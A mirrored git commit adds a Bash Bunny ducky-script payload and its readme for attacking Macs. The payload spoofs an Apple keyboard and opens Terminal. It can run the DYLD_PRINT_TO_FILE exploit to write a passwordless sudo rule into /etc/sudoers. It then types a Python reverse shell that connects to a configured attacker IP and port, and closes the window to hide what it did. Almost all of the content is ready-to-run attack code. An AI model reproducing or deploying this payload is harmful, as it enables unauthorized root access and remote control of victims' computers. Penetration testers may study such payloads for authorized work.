mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
commit
1e8406bc38
49
payloads/library/MacReverseShell/payload.txt
Executable file
49
payloads/library/MacReverseShell/payload.txt
Executable file
@ -0,0 +1,49 @@
|
||||
LED B
|
||||
#Set your Variables, bro
|
||||
DYLD_ROOT=true
|
||||
LHOST=192.168.17.12
|
||||
LPORT=4444
|
||||
|
||||
LANGUAGE='us'
|
||||
|
||||
# Gimme a Keyboard please. Thanks.
|
||||
ATTACKMODE HID VID_0X05AC PID_0X021E
|
||||
LED R G B
|
||||
|
||||
# Get a terminal
|
||||
QUACK DELAY 400
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 300
|
||||
QUACK STRING terminal
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK DELAY 400
|
||||
|
||||
# optional DYLD exploit script
|
||||
if $DYLD_ROOT; then
|
||||
LED R
|
||||
QUACK SPACE
|
||||
QUACK STRING echo \'echo \"\$\(whoami\) ALL=\(ALL\) NOPASSWD\:ALL\" \>\&3\' \| DYLD_PRINT_TO_FILE=\/etc\/sudoers newgrp\; sudo -s
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK ENTER
|
||||
QUACK ENTER
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
fi
|
||||
|
||||
# python reverse shell
|
||||
QUACK SPACE
|
||||
QUACK STRING \(python -c \'import sys,socket,os,pty\; \_,ip,port=sys.argv\; s=socket.socket\(\)\; s.connect\(\(ip,int\(port\)\)\)\; [os.dup2\(s.fileno\(\),fd\) for fd in \(0,1,2\)]\; pty.spawn\(\"\/bin\/bash\"\)\' $LHOST $LPORT \&\)
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
QUACK SPACE
|
||||
QUACK STRING clear
|
||||
QUACK ENTER
|
||||
QUACK GUI q
|
||||
QUACK DELAY 100
|
||||
QUACK ENTER
|
||||
|
||||
# Green is the official Light of "finished"
|
||||
LED G
|
||||
21
payloads/library/MacReverseShell/readme.md
Executable file
21
payloads/library/MacReverseShell/readme.md
Executable file
@ -0,0 +1,21 @@
|
||||
# Mac Reverse Shell
|
||||
|
||||
Author: mrt0mat0
|
||||
Version: Version 1.0
|
||||
|
||||
## Description
|
||||
|
||||
Using ducky script, it opens a python reverse shell to the IP and PORT of your choosing. Also, as a nice little bonus, it runs the DYLD exploit that, if vulnerable will give you a root shell.
|
||||
|
||||
## Configuration
|
||||
|
||||
This is configured for Macbooks as a keyboard. I am not 100% about how the VID and PID variables work, so that may just be BS at the top :) - That's what github is for. Exploit does not work on updated macs
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ---------------- | ------------------------------------- |
|
||||
| Blue | Setup |
|
||||
| White | Running the scripts |
|
||||
| Red | r00t exploit is running (optional |
|
||||
| Green | Finished |
|
||||
Loading…
x
Reference in New Issue
Block a user